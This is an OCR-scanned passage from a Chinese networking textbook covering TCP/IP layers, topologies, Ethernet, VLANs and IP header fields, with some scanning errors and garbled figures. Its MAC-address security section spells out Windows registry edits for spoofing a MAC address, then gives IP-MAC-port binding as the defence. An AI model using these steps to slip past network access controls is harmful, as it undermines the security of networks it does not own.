Protocol) 。 它 的 功能 包括 以 下 三 个 方面 的 内 容 。 

(1) 处 理 来 自传 输 层 的 数据 段 发 送 请 求 。 在 收 到 数据 段 发 送 请 求 之 后 ,将 数据 段 装 入 
IP 数据 报 , 填 充 报头 ,选择 发 送 路 径 , 然 后 将 数据 报 传递 到 下 一 层 。 

(2) 处 理 接收 到 的 数据 报 。 在 接收 到 其 他 主机 发 送 来 的 数据 报 之 后 ,检查 目的 地 址 , 选 
择 下 一 个 转发 路 径 ,并 进行 转发 。 若 目的 地 址 为 本 结 点 IP 地 址 , 则 去 掉 报头 ,将 数据 段 交 给 
传输 层 处 理 。 

(3) 处 理 网 络 互联 的 路 径流 量 控制 和 拥塞 等 方面 的 问题 。 

传输 层 在 TCP/IP 模型 中 处 于 网 络 层 之 上 , 它 负 责 在 源 端 和 目的 端的 主机 上 对 等 实体 
间 建 立 端 到 端的 连接 。TCP/IP 参考 模型 定义 了 两 种 协议 : 传输 控制 协议 (Transport 
Control Protocol,TCP) 和 用 户 数 据 报 协议 (User Datagram Protocol, UDP)。TCP 是 一 种 
可 靠 的 面向 连接 的 协议 , 它 能 将 一 台 主 机 的 字 节 流 无 差错 地 传送 到 目的 主机 。TCP 将 应 用 
层 的 数据 分 成 多 个 数据 段 ,然后 将 数据 段 交 给 网 络 层 , 发 送 到 目的 主机 。 在 目的 主机 ,网 络 
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层 把 接收 到 的 数据 段 交 给 传输 层 , 传 输 层 再 将 多 个 数据 段 还 原 成 应 用 程序 数据 交 给 应 用 层 。 
TCP 还 要 同时 完成 流量 控制 功能 ,协调 接收 端 和 发 送 端的 接收 和 发 送 速度 ,达到 正确 传输 
的 目的 。UDP 是 一 个 不 保证 可 靠 传输 的 无 连接 协议 ,用 于 不 需要 TCP 的 排序 和 流量 控制 
能 力 的 场合 。 

应 用 层 位 于 传输 层 之 上 ,是 TCP/IP 模型 的 最 高 层 , 它 包 含 所 有 的 高 层 协议 ,如 远程 终 
端 协议 (Telnet) ,文件 传输 协议 (FTP) \ 简 单 邮 件 传输 协议 CSMTP) ,域名 系统 CDNS) 、 超 文 
本 传输 协议 (HTTP) ,动态 主机 配置 协议 (DHCP) 等 。 

TCP/IP 模型 的 最 下 层 为 网 络 接 口 层 ,负责 通过 网 络 发 送 和 接收 IP 数据 报 。TCP/IP 
参考 模型 允许 主机 连 入 网 络 时 使 用 多 种 协议 ,例如 局 域 网 的 Ethernet、 Token Ring、 
X. 25 等 。 

3. 网 络 层次 功能 的 实现 

按照 层次 结构 思想 构成 的 一 组 从 上 到 下 单 向 依赖 的 各 层 协 议 称 为 协议 簇 ,它们 的 具体 
实现 称 为 协议 栈 (Protocol Stack)。 

在 网 络 协议 层次 中 ,每 个 协议 层 既 可 以 用 软件 实现 ,也 可 以 用 硬件 实现 ,还 可 以 通过 使 
用 硬件 和 软件 的 组 合 方式 来 实现 。 应 用 层 协议 (如 HTTP、SMTP) 几 乎 总 是 在 终端 系统 中 
用 软件 实现 ; 目前 除 多 层 交 换 机 和 防火 墙 中 使 用 部 分 硬件 方式 外 ,传输 层 协议 绝 大 部 分 也 
采用 软件 实现 ; 物理 层 和 数据 链 路 层 负责 处 理 特定 链 路 上 的 通信 ,因此 ,它们 通常 在 与 其 关 
联 的 链 路 的 网 络 适 配器 (网 络 接口 卡 ) 上 来 实现 ; 网 络 层 的 协议 功能 通常 采用 硬件 与 软件 的 


组 合 方式 实现 。 
信息 在 各 层 间 的 格式 变化 如 图 2-2 所 示 。 
系统 A 信息 系统 系统 B 
第 7 层 第 7 层 
第 6 层 第 6 层 
第 5 层 第 5 层 
第 4 层 头 十 数据 ] | 第 4 层 
第 3 层 头 2| 数据 第 3 层 
第 2 层 头 3| ”数据 第 2 层 
第 1 层 比特 流 101100011010 | 第 ! 层 


图 2-2 信息 在 各 层 之 间 传递 示意 图 


在 图 2-2 中 ,系统 B 的 第 nn 层 (n<7) 需 要 解读 系统 A 的 第 nn 层 头 部 的 控制 信息 ,来 确定 
信息 的 内 容 最 终 还 原 信息 。 


2.2 计算 机 网 络 拓扑 结构 及 其 特点 


2.2.1 网 络 拓扑 的 概念 


网 络 拓扑 (Network Topology) 是 特定 的 物理 .逻辑 或 虚拟 网 络 部 件 和 设备 ( 结 点 ) 的 排 
列 。 简 而 言 之 ,计算 机 网 络 的 拓扑 结构 是 引用 拓扑 学 中 研究 与 大 小 、 形 状 无 关 的 点 、 线 关系 
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的 方法 ,把 网 络 中 的 计算 机 和 通信 设备 抽象 为 一 个 点 ,把 传输 介质 抽象 为 一 条 线 , 由 点 和 线 
组 成 的 几何 图 形 就 是 计算 机 网 络 的 拓扑 结构 。 网 络 的 拓扑 结构 反映 出 网 络 中 各 个 实体 之 间 
的 逻辑 结构 关系 。 


2.2.2 常见 的 网 络 拓扑 种 类 及 其 特点 


常见 的 网 络 拓 扑 结 构 有 总 线 型 . 星 状 、 环 状 、 树 状 、 网 状 和 混合 型 拓扑 。 

总 线 型 拓扑 结构 是 将 网 络 中 的 所 有 设备 通过 相应 的 硬件 接口 直接 连接 到 公共 总 线 上 ， 
结 点 之 间 按 广播 方式 通信 ,一 个 结 点 发 出 的 信息 ,总线 上 的 其 他 结 点 均 可 “收听 ”到 。 这 种 拓 
扑 形式 网 络 的 优点 是 结构 简单 ,布线 容易 .可 靠 性 较 高 .易于 扩充 ,是 局 域 网 常 采用 的 拓扑 结 
构 。 缺 点 是 所 有 的 数据 都 需 经 过 总 线 传 送 ,总线 成 为 整个 网 络 的 瓶颈 ; 出 现 故 障 诊断 较为 
困难 。 最 著名 的 总 线 型 拓扑 结构 网 络 就 是 以 太 网 (Ethernet) 。 

星 状 拓扑 结构 是 每 个 结 点 都 有 一 条 单独 的 通信 线路 与 中 心 结 点 连接 。 其 优点 是 结构 简 
单 、 容 易 实现 ,便于 管理 ,连接 点 的 故障 容易 监测 和 排除 。 缺 点 是 中 心 结 点 是 全 网 络 的 瓶颈 ， 
中 心 结 点 出 现 故 障 会 导致 网 络 的 瘫痪 。 

环 状 拓 扑 结 构 将 各 结 点 通过 通信 线路 组 成 闭合 回路 , 环 中 数据 只 能 单 向 传输 。 优 点 是 
结构 简单 ,适合 使 用 光纤 ,传输 距离 远 ,传输 延迟 确定 。 缺 点 是 环 网 中 的 每 个 结 点 均 成 为 网 
络 可 靠 性 的 瓶颈 ,任意 结 点 出 现 故障 都 会 造成 网 络 瘫痪 ,另外 故障 诊断 也 较 困 难 。 最 著名 的 
环 状 拓扑 结构 网 络 是 令 牌 环 网 (Token Ring) 。 

树 状 拓扑 结构 是 一 种 层次 结构 , 结 点 按 层 次 连接 ,信息 交换 主要 在 上 下 结 点 之 间 进 行 ， 
相 邻 结 点 或 同 层 结 点 之 间 一 般 不 进行 数据 交换 。 优 点 是 连接 简单 ,维护 方便 ,适用 于 汇集 信 
息 的 应 用 要 求 。 缺 点 是 资源 共享 能 力 较 低 ,可靠 性 不 高 ,任何 一 个 工作 站 或 链 路 的 故障 都 会 
影响 整个 网 络 的 运行 。 

网 状 拓扑 结构 ,又 称 做 无 规则 结构 , 结 点 之 间 的 连接 是 任意 的 ,并 且 一 个 结 点 和 其 他 结 
点 的 连接 不 止 一 条 线路 ,线路 的 连接 没有 规律 。 其 优点 是 系统 可 靠 性 高 ,比较 容易 扩展 ,但 
是 结构 复杂 ,管理 和 控制 难度 很 大 ,每 一 结 点 都 与 多 点 进行 连接 ,因此 必须 采用 路 由 算法 和 
流量 控制 方法 。 目 前 广域网 大 多 采用 网 状 拓扑 结构 。 

混合 型 拓扑 结构 就 是 将 两 种 或 两 种 以 上 的 拓扑 结构 组 合 使 用 。 优 点 是 可 以 对 网 络 的 基 
本 拓扑 取长补短 ,缺点 是 网 络 配置 管理 难度 大 。 


2.3 ”TCP/IP 体系 


2.3.1 TCP/IP 的 层次 结构 


TCP/IP 是 Transmission Control Protocol/Internet Protocol( 传 输 控 制 协 议 / 互 联网 协 
议 ) 的 缩写 。 美 国 国防 部 高 级 研究 计划 局 DARPA 为 了 实现 异种 网 络 之 间 的 互联 与 互通 ,大 
力 资助 互联 网 技术 的 开发 ,于 1977 年 到 1979 年 间 推出 目前 形式 的 TCP/IP 体系 结构 和 协 
议 。1980 年 左右 ,ARPA 开始 将 ARPANET 上 的 所 有 机 器 转向 TCP/IP, 并 以 ARPANET 
为 主干 建立 Internet。 

OSI 参考 模型 的 标准 最 早 是 由 ISO 和 CCITT(ITU 的 前 身 ) 制 定 的 ,有 浓厚 的 通信 背 
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景 ,因此 也 打上 了 深厚 的 通信 系统 的 特色 ,比如 对 服务 质量 (QoS) ,差错 率 的 保证 ,只 考虑 了 
面向 连接 的 服务 。 并 且 是 先 定义 一 套 功能 完整 的 构架 ,再 根据 该 构架 来 发 展 相应 的 协议 与 

TCP/IP 产生 于 对 Internet 的 研究 与 实践 中 ,是 应 实际 需求 而 产生 的 ,再 由 IAB、IETF 
等 组 织 标准 化 ,而 并 不 是 之 前 定义 一 个 严谨 的 框架 。 而 且 TCP/IP 最 早 是 在 UNIX 系统 中 
实现 的 ,但 由 于 TCP/IP 考虑 了 计算 机 网 络 的 特点 ,比较 适合 计算 机 实现 和 使 用 。 

从 图 2-1 可 以 看 出 ,TCP/IP 体系 是 一 个 4 层 协 议 体系 模型 。 这 4 层 从 下 到 上 分 别 
如 下 。 

1. 网 络 接口 层 

OSI 模型 把 这 一 层 分 为 两 层 , 而 TCP/IP 模型 则 将 两 层 合 为 一 层 , 网 络 接口 层 包括 用 于 
物理 连接 、 传 输 的 所 有 功能 ,包括 多 种 逻辑 链 路 控制 和 媒体 访问 协议 。 在 信息 发 送 时 ,网 络 
接口 层 的 功能 是 从 上 层 ( 网 络 层 ) 接 收 IP 数据 报 并 通过 特定 的 网 络 进行 传输 ; 在 信息 接收 
时 ,网 络 接口 层 的 功能 是 从 网 络 链 路 上 接收 物理 帧 ,抽取 出 IP 数据 报 并 转交 给 网 络 层 。 

2. 网 络 层 

网 络 层 (Internet 层 ) 由 在 两 个 主机 之 间 通 信 必 有 需 的 协议 组 成 ,通信 的 数据 报 文 必须 是 
可 路 由 的 。 该 层 负责 相同 或 不 同 网 络 中 计算 机 之 间 的 通信 ,主要 处 理 数据 报 和 路 由 ,因此 处 
理 路 由 的 协议 也 称 为 路 由 协议 ,路 由 协议 包括 内 部 网 关 协 议 (IGP) 和 外 部 网 关 协 议 (EGP)。 

在 这 一 层 ,处 理 数据 报 文 的 协议 最 主要 的 是 IP 协议 。 此 外 ,为 了 处 理 报 文 传递 过 程 中 
的 错误 ,还 采用 了 ICMP ,为 了 寻找 传输 目的 地 的 路 径 , 该 层 采用 了 网 络 层 的 IP 地 址 。 由 于 
IP 地 址 是 一 个 逻辑 地 址 ,因此 极 易 受到 IP 地 址 伪装 攻击 。 

3. 传输 层 

传输 层 支持 的 功能 包括 : 网 络 中 对 数据 进行 分 段 ,执行 各 种 检查 来 保证 所 接收 到 数据 
的 完整 性 ,为 多 个 应 用 同时 传输 数据 将 多 路 数据 流 进 行 多 路 复 用 。 该 层 能 识别 特殊 应 用 ,对 
接收 到 的 乱 序 报 文 可 以 进行 重 排 。 该 层 的 寻 址 方式 采用 了 端口 地 址 。 该 层 的 两 个 传输 协议 
是 : 传输 控制 协议 TCP, 为 应 用 程序 提供 可 靠 的 通信 连接 ,适合 于 一 次 传输 大 批 数据 的 情 
况 , 并 适用 于 要 求 得 到 响应 的 应 用 程序 ; 用 户 数 据 报 协 议 UDP ,提供 了 无 连接 通信 , 且 不 对 
传送 包 进 行 可 靠 的 保证 ,适合 于 一 次 传输 小 量 数据 ,可 靠 性 则 由 应 用 层 来 负责 。 

4. 应 用 层 

TCP/IP 的 应 用 层 相 当 于 OSI 模 型 的 会 话 层 、 表 示 层 和 应 用 层 , 它 向 用 户 提供 一 组 常用 
的 应 用 层 协议 ,其 中 包括 : Telnet、.SMTP、DNS、HTTP 等 。 此 外 ,在 应 用 层 中 还 包含 用 户 
应 用 程序 ,它们 均 是 建立 在 TCP/IP 协议 簇 之 上 的 专用 程序 。 由 于 该 层 与 很 多 应 用 程序 相 
关联 ,因此 容易 受到 黑客 的 攻击 。 简 单 邮件 传输 协议 (SMTP) 容 易 受 到 的 威胁 是 : 邮件 炸 
弹 、 病 毒 ,垃圾 邮件 和 木马 等 。 其 保护 措施 是 认证 ,附件 病毒 扫描 和 用 户 安全 意识 教育 。 文 
件 传输 协议 (FTP) 容 易 受到 的 威胁 是 : 明文 传输 易 导致 密码 泄漏 ,黑客 恶意 传输 非法 使 用 
等 。 超 文本 传输 协议 (HTTP) 容 易 受 到 的 威胁 是 恶意 程序 (ActiveX 控件 .ASP 程序 和 CGI 
程序 等 ) 攻 击 。 

图 2-3 给 出 了 TCP/IP 体系 中 的 常用 协议 。 
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应 用 层 SMTP||TFTP || RPC || NTP || DNS || FTP ||HTTP 


传输 层 UDP | Tcp 
络 层 Pp | ICMP IGMP 
网 络 层 Rp 

网 络 接口 层 | | 以 太 网 令 牌 环 网 帧 中 继 AT™ 


图 2-3 TCP/IP 体系 中 的 常用 协议 及 其 承载 关系 示意 图 


2.3.2 TCP/IP 模型 与 OSI 协议 模型 的 比较 


由 于 TCP/IP 模型 与 OSI 协议 模型 的 制定 背景 和 时 间 都 不 同 , 因 此 两 者 有 很 大 的 不 同 ， 
总 体 上 ,体现 在 以 下 两 点 。 

(1) TCP/IP 模型 在 实现 上 力求 简单 高 效 , 如 IP 层 并 没有 实现 可 靠 的 连接 ,而 是 把 它 交 
给 了 TCP 层 实现 ,这 样 保证 了 IP 层 实 现 的 简练 性 。 事 实 上 ,有 些 服务 并 不 需要 可 靠 的 面向 
连接 的 服务 ,如 果 在 IP 层 上 加 上 可 靠 性 控制 ,会 使 协议 变 得 复杂 ,也 是 处 理 能 力 的 一 种 浪 
费 。OSI 参考 模型 在 各 层 的 实现 上 有 所 重复 ,而 且 会 话 层 和 表示 层 不 是 对 很 多 服务 都 有 用 ， 
无 疑 这 种 模型 有 些 烦 琐 。 

(2) TCP/IP 经 历 了 长 时 间 的 实践 检验 ,尽管 不 甚 完善 ,特别 是 在 网 络 接口 层 的 设计 上 
层次 还 不 是 非常 清晰 ,甚至 还 有 很 多 安全 性 上 的 缺点 ,但 毕竟 是 非常 实用 好 用 的 一 个 协议 ， 
因此 ,得 到 了 大 家 的 接受 ,并 被 普遍 使 用 。 


2.3.3 网 络 接口 层 及 以 太 网 


1. 网 络 接口 层 的 功能 

TCP/IP 中 的 网 络 接口 层 对 应 OSI 模型 中 的 物理 层 和 数据 链 路 层 ,是 TCP/IP 的 最 底 
层 , 不 过 通常 在 描述 TCP/IP 模型 时 还 是 会 划分 为 物理 层 和 数据 链 路 层 。 

物理 层 的 主要 任务 同 OSI 的 物理 层 一 样 , 是 确定 传输 媒体 接口 的 特性 ,并 向 数据 链 路 
层 提 供 可 靠 的 .透明 的 比特 流传 输 服务 。 

数据 链 路 层 实现 的 主要 功能 包括 链 路 管理 、 成 帧 与 帧 同步 ,差错 控制 .流量 控制 以 及 为 
网 络 层 提供 服务 。 

2. 网 络 接口 层 的 协议 

网 络 接口 层 的 协议 ,主要 集中 在 数据 链 路 层 。 

数据 链 路 层 的 协议 ,可 以 分 为 面向 字符 的 链 路 层 协议 和 面向 比特 的 链 路 层 协议 两 类 。 
随 着 计算 机 通信 的 发 展 ,面向 字符 的 链 路 控制 规程 由 于 字符 的 兼容 性 等 问题 ,使 用 越 来 越 
少 。 而 面向 比特 的 规程 更 适合 于 计算 机 通信 。 

面向 字符 的 链 路 层 协议 ,如 ISO 的 基本 型 传输 控制 规程 及 其 扩展 部 分 IS1746,IBM 的 
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二 进 制 同 步 通信 规程 BSC,DEC 的 数字 数据 通信 报 文 协议 DDCMP 和 点 到 点 协议 PPP 等 。 

面向 比特 的 链 路 层 协议 ,如 IBM 的 同步 数据 链 路 控制 协议 SDLC,ANSI 改进 SDLC 提 
出 的 先进 数据 通信 控制 协议 ADCCP,ISO 修改 SDLC 提出 的 数据 链 路 控制 HDLC 等 。 

在 Internet 中 ,数据 链 路 层 协议 主要 有 SLIP、PPP 和 PPoE 等 。 

SLIP 是 Windows 远程 访问 的 一 种 旧 工 业 标准 ,主要 在 UNIX 远程 访问 服务 器 中 使 用 。 
因为 SLIP 是 面向 低速 串 行 线路 的 ,可 以 用 于 专用 线路 ,也 可 以 用 于 拨号 线路 ,由 于 客户 端 
需要 配置 固定 的 IP 地 址 ,因此 目前 使 用 不 多 。 

而 PPP(Point-to-Point Protocol) 是 在 SLIP 的 基础 上 发 展 起 来 的 ,由 于 SLIP 只 支持 异 
步 传输 方式 ,无 协商 过 程 , 它 逐 渐 被 PPP 所 替代 。PPP 作为 一 种 提供 在 点 到 点 链 路 上 封装 、 
传输 网 络 层 数据 包 的 数据 链 路 层 协议 ,处 于 OSI 参考 模型 的 第 二 层 , 主 要 用 于 支持 全 双 工 
的 同 . 异 步 链 路 上 进行 点 到 点 之 间 的 数据 传输 。PPP 由 于 能 够 提供 验证 , 易 扩充 ,支持 同 
步 、 异 步 通 信和 而 获得 较 广泛 的 应 用 。 

PPPoE 为 基于 以 太 网 的 点 到 点 通信 协议 ,是 将 点 对 点 协议 (PPP) 封 装 在 以 太 网 
(Ethernet) 框 架 中 的 一 种 网 络 隧 道 协议 。 由 于 协议 中 集成 了 PPP, 所 以 实现 了 传统 以 太 网 
不 能 提供 的 身份 验证 .加 密 以 及 压缩 等 功能 ,也 可 用 于 有 线 电视 调制 解 调 器 (Cable Modem) 
和 数字 用 户 线路 (DSL) 等 采用 以 太 网 协议 向 用 户 提 供 接 入 服务 的 协议 体系 。 从 本 质 上 来 
说 , 它 是 一 个 允许 在 以 太 广 播 域 中 的 两 个 以 太 网 接口 间 建 立 点 对 点 隧道 的 协议 。 

3. 以 太 网 

以 太 网 (Ethernet) 是 指 由 Xerox 公司 创建 并 由 Xerox、Intel 和 DEC 公司 联合 开发 的 基 
带 局 域 网 规范 DIX Ethernet V2。 后 来 ,美国 电气 电子 工程 师 学 会 采用 了 该 标准 ,并 加 以 改 
进 成 为 IEEE 802.3。 由 于 DIX Ethernet V2 和 IEEE 802. 3 标准 只 有 很 小 的 差别 ,因此 人 
们 也 常 把 IEEE 802. 3 称 做 以 太 网 。 以 太 网 络 使 用 CSMA/CD( 带 有 冲突 检测 的 载波 侦 听 多 
路 访问 协议 ) 技 术 ,这 是 最 初 的 速率 为 10Mb/s 的 一 种 局 域 网 技术 。 以 太 网 不 是 一 种 具体 的 
网 络 ,而 是 一 种 技术 规范 ,国际 标准 组 织 为 其 定义 的 规范 编号 为 ISO 802. 3。 

以 太 网 在 组 帧 时 ,采用 的 链 路 层 地 址 是 MAC 地 址 ,MAC 地 址 也 叫 物理 地 址 、 硬 件 地 址 
或 链 路 地 址 ,由 网 络 设备 制造 商 生 产 时 写 在 硬件 内 部 。MAC 地 址 的 长 度 为 48b(6B) ,通常 
表示 为 12 个 十 六 进 制 数 ,每 两 个 十 六 进 制 数 之 间 用 冒号 隔 开 ,如 08:00:20:0A:8C:6D 就 是 
一 个 MAC 地 址 ,其 中 前 6 位 十 六 进 制 数 08:00:20 代表 网 络 硬件 制造 商 的 编号 , 它 由 IEEE 
(电气 与 电子 工程 师 协会 ) 分 配 ,而 后 6 位 十 六 进 制 数 0A:8C:6D 代表 该 制造 商 所 制造 的 某 
个 网 络 产品 (如 网 卡 ) 的 系列 号 。 只 要 用 户 不 去 更 改 自己 的 MAC 地 址 ,那么 该 用 户 的 MAC 
地 址 在 世界 上 是 唯一 的 。 

以 太 网 是 当今 现 有 局 域 网 采用 的 最 通用 的 通信 协议 标准 ,该 标准 定义 了 在 局 域 网 
(LAN) 中 采用 的 电缆 类 型 和 信号 处 理 方法 。 目 前 ,该 协议 支持 传统 的 标准 以 太 网 (以 
10Mb/s 速率 传输 ) ,快速 以 太 网 (以 100Mb/s 速率 传输 ) \ 千 兆 以 太 网 (以 1Gb/s 速率 传输 ) 
和 万 兆 以 太 网 (以 10Gb/s 速率 传输 ) 等 各 种 类 型 ,而 新 一 代 的 以 太 网 标准 (支持 40Gb/s 速 
率 传输 和 100 Gb/s 速率 传输 ) 也 已 发 布 。 

以 太 网 可 以 采用 多 种 连接 介质 ,包括 同 轴 电 缆 、 双 绞 线 .光纤 和 无 线 等 。 

以 太 网 的 帧 最 大 为 1518B, 其 中 封装 的 网 络 层 数 据 为 1500B。 
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4. MAC 地 址 的 安全 性 

通常 ,为 了 提高 局 域 网 访问 的 安全 性 ,会 采取 将 交换 机 的 端口 与 MAC 地 址 绑 定 的 方 
式 。 因 为 ,通常 MAC 地 址 是 无 法 改变 的 ,是 网 络 适配器 生产 出 来 以 后 被 唯一 指定 的 地 址 。 

但 是 ,也 有 一 些 方法 可 以 修改 MAC 地 址 ,使 得 这 种 方式 存在 安全 隐患 。 

修改 MAC 地 址 的 方法 主要 有 以 下 两 种 。 

第 一 种 方法 就 是 采用 硬件 的 方法 修改 MAC 地 址 。 硬 件 的 方法 就 是 直接 对 网 卡 进行 操 
作 , 修 改 保存 在 网 卡 的 EPROM 里 面 的 MAC 地 址 ,通过 网 卡 生产 厂家 提供 的 修改 程序 可 以 
更 改 存储 器 里 的 地 址 。 

第 二 种 方法 就 是 软件 修改 的 方法 。 软 件 修改 的 方法 相对 来 说 要 简单 得 多 。 在 
Windows 中 ,网 卡 的 MAC 保存 在 注册 表 中 ,实际 使 用 也 是 从 注册 表 中 提取 的 ,所 以 只 要 修 
改 注册 表 就 可 以 改变 MAC。 例 如 ,在 Windows 2000/XP 中 修改 时 ,只 需 打 开 注 册 表 编辑 
器 ,在 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Class\4D36E970- 
E325-11CE-BFC1-08002BE10318 中 的 0000、0001、0002 等 主键 下 ,查找 DriverDesc, 内 容 为 
欲 修改 的 网 卡 的 描述 ,如 “Realtek RTL8029(AS)-based PCI Ethernet Adapter” ,然后 在 其 
下 添加 一 个 字符 串 , 命 名 为 NetworkAddress, 其 值 设 为 欲 更 改 的 MAC 地址, 如 
00E0DDE0E0E0, 然 后 到 其 下 Ndi\params 中 添加 一 项 名 为 NetworkAddress 的 主键 ,在 该 
主键 下 添加 名 为 default 的 字符 串 , 其 值 是 欲 设 定 的 MAC 地 址 即 可 。 

防止 这 种 安全 性 攻击 的 方法 是 将 IP 地 址 和 MAC 地 址 捆绑 起 来 ,或 者 可 以 在 IP.MAC 
绑 定 的 基础 上 ,再 把 端口 绑 定 进去 ,即将 IP-MAC-PORT 三 者 绑 定 在 一 起 ,这 样 可 以 提高 网 
络 链 路 层 的 安全 性 。 

5. 虚拟 局 域 网 技术 

虚拟 局 域 网 (Virtual LAN,VLAN) 是 由 一 些 局 域 网 网 段 构成 的 与 物理 位 置 无 关 的 逻辑 
组 ,而 这 些 网 段 具 有 某 些 共同 的 需求 。 每 一 个 VLAN 的 帧 都 有 一 个 明确 的 标识 符 , 指 明 发 
送 帧 的 工作 站 属于 哪 一 个 VLAN。 

虚拟 局 域 网 其 实 只 是 局 域 网 给 用 户 提供 的 一 种 服务 ,而 不 是 一 种 新 型 局 域 网 。 

图 2-4 是 一 个 建筑 物 内 将 10 个 工作 站 用 4 个 交换 机 连接 起 来 组 成 三 个 VLAN 的 示 
意图 。 


Tn 
a A YA 
VLANI 


图 2-4 VLAN 划分 示意 图 
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在 物理 上 ,构成 了 三 个 局 域 网 , 即 : 

LAN]1:(A1,B1,C1),LAN2:(A2,B2,C2),LAN3:(A3,B3,C3,C4) 

而 在 逻辑 上 ,构成 了 三 个 虚拟 局 域 网 , 即 : 

VLAN1:(Al,A2,A3),VLAN2:(B1,B2,B3),VLAN3:(C1,C2,C3,C4) 

从 图 2-4 中 可 以 看 出 ,每 一 个 VLAN 的 工作 站 可 以 处 于 不 同 的 物理 局 域 网 络 中 ,因此 
可 以 方便 地 把 不 在 同一 个 地 方 的 工作 站 在 逻辑 上 划分 到 一 个 局 域 网 中 ,而 在 同一 个 虚拟 局 
域 网 中 的 工作 站 相互 通信 时 ,具有 和 普通 局 域 网 一 样 的 属性 , 即 在 同一 个 局 域 网 内 的 广播 只 
能 由 该 局 域 网 内 的 成 员 听 到 ,而 无 法 跨越 VLAN。 因 此 ,虚拟 局 域 网 限制 了 接收 广播 信息 
的 工作 站 数 ,使 得 网 络 不 会 因 广 播 信息 过 多 出 现 广 播 风暴 而 导致 性 能 恶化 。 男 外 ,由 于 不 属 
于 某 个 VLAN 的 用 户 无 法 “ 听 ” 到 该 VLAN 内 用 户 之 间 的 通信 ,因此 提高 了 网 络 的 安全 性 。 


2.3.4 网 络 层 及 IP 协议 


IP 协议 是 网 络 层 最 主要 最 核心 的 协议 ,因此 又 将 网 络 层 称 为 IP 层 。IP 层 采用 IP 数据 
报 ( 有 时 候 也 叫 IP 分 组 ,以 下 这 两 个 名 词 是 等 同 的 ) 的 方式 进行 通信 ,这 种 传输 方式 类 似 于 
电报 ,没有 可 靠 性 保障 。 通 过 该 层 ,可 以 将 所 有 低层 的 物理 实现 隐藏 起 来 ,将 数据 报 从 源 主 
机 发 送出 去 ,并 且 使 这 些 数 据 报 独立 地 到 达 目 的 主机 。 在 数据 报 传送 过 程 中 ,即使 是 连续 的 
数据 报 ,也 可 能 走 过 不 同 的 路 径 , 到 达 目 的 主机 的 顺序 也 会 不 同 于 它们 被 发 送 时 的 顺序 。 这 
是 因为 网 络 上 的 情况 是 复杂 的 ,随时 可 能 有 一 些 路 径 发 生 故 障 , 或 者 是 网 络 的 某 处 出 现 
拥塞 。 

在 网 络 层 ,定义 了 一 个 标准 的 包 格式 和 协议 ,该 格式 的 数据 报 能 被 网 上 所 有 的 主机 或 转 
发 设备 理解 和 正确 处 理 。 在 这 一 层 ,路 由 选择 是 非常 重要 的 ,路 由 选择 通常 是 由 路 由 器 来 完 
成 。 从 应 用 层 到 链 路 层 数据 的 封装 是 逐 层 进行 的 ,图 2-5 是 以 一 个 TCP 报 文 经 过 IP 报头 
封装 最 后 再 由 数据 链 路 层 封 装 过 程 的 示意 图 。 


应 用 层 数据 应 用 层 数据 
传输 层 TCP 头 数据 数据 报 文 
网 络 层 IP 头 TCP 头 数据 数据 报 
网 络 接口 层 帧 头 IP 头 TCP 头 数据 校 验 和 | 帧 


图 2-5 TCP/IP 数据 封装 示意 图 


IP 数据 报 的 头 部 组 成 如 图 2-6 所 示 。 

下 面 对 IP 头 部 的 字段 进行 说 明 。 

(1) 版 本 域 , 长 度 为 4b, 域 值 为 4 表示 IPv4, 域 值 为 6 则 表示 IPv6 。 

(2) 分 组 头 部 长 度 , 占 4b, 定 义 了 以 4B 为 一 个 单位 的 分 组 头 的 长 度 。 分 组 头 中 除了 IP 
选项 域 与 填充 域 之 外 ,其 他 各 项 是 定 长 的 。 各 定 项 域 长 度 为 20B, 此 时 分 组 长 度 的 值 为 5; 
由 于 4 位 表示 的 最 大 值 为 15 ,因此 分 组 头 部 最 长 为 60B。 

(3) 服务 类 型 域 ,长 度 为 8b, 用 于 指示 路 由 器 如 何 处 理 该 分 组 。 

(4) 总 长 度 域 ,长 度 为 16b, 它 定义 了 以 B 为 单位 的 分 组 的 总 长 度 , 这 一 点 与 分 组 头 部 
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图 2-6 JP 数据 报头 部 组 成 


长 度 域 有 所 不 同 。IP 分 组 的 最 大 长 度 为 2* 一 1 二 65 535B, 这 其 中 包括 分 组 头 长 度 。IP 分 
组 中 高 层 协议 的 数据 长 度 等 于 分 组 的 总 长 度 减 去 分 组 头 长 度 。 当 较 长 的 IP 分 组 被 较 短 的 
数据 帧 封装 时 (例如 以 太 网 帧 中 封装 的 数据 最 大 长 度 为 1500B) , 它 需 要 对 IP 分 组 进行 分 片 
处 理 。 

(5) 片 偏 移 域 ,用 于 在 对 分 组 进行 分 段 时 确定 每 个 分 段 的 位 置 。 

(6) 生存 时 间 域 ,用 于 限制 IP 分 组 在 网 络 中 的 存活 时 间 。 分 组 每 经 过 一 个 路 由 器 , 生 
存 时 间 就 要 减 1, 当 减 为 0 时 ,就 丢弃 该 分 组 ,同时 将 出 错 的 信息 发 往 源 主机 。 

(7) 协议 域 ,指使 用 IP 分 组 的 高 层 协 议 的 类 型 。 例 如 当 协 议 域 值 为 6 时 ,表明 上 层 是 
TCP 报 文 。 

(8) 头 校 验 和 ,用 来 校 验 分 组 的 头 部 在 传输 的 过 程 中 是 否 出 现 了 错误 ,保证 分 组 头 部 数 
据 的 完整 性 。 

(9) 源 IP 地 址 和 目的 IP 地 址 ,分 别 标明 发 送 方 和 接收 方 的 网 络 号 和 主机 号 。 在 分 组 
的 整个 传输 过 程 中 ,无论 采 用 什么 样 的 传输 路 径 或 如 何 分 片 , 源 IP 地 址 和 目的 IP 地 址 始终 
保持 不 变 。 


2.3:5 下 :地址 


IP 地 址 的 发 展 经 历 了 以 下 4 个 阶段 。 

第 一 阶段 是 在 IPv4 协议 制定 的 初期 ,时间 在 1981 年 左右 ,这 一 阶段 划分 出 了 标准 分 类 
的 IP 地 址 ,常用 的 A 类 、B 类 与 C 类 IP 地址 采用 “网 络 号 -主机 号 ”的 两 级 层次 结构 。 

第 二 阶段 是 在 标准 分 类 的 IP 地 址 的 基础 上 ,增加 子 网 号 的 三 级 地 址 结构 。 

第 三 阶段 则 是 1993 年 出 现 的 无 类 域 间 路 由 技术 (CIDR) ,又 称 超 网 技术 ,其 将 IP 地 址 
不 再 按照 标准 的 分 类 方式 分 类 ,而 是 用 子 网 掩 码 直接 标识 出 网 络 位 和 主机 位 ,并 可 以 将 多 个 
现 有 的 IP 地 址 合并 成 较 大 的 `. 具 有 更 多 主机 地 址 的 路 由 域 ,以 简化 路 由 表 , 提 高 路 由 器 的 工 

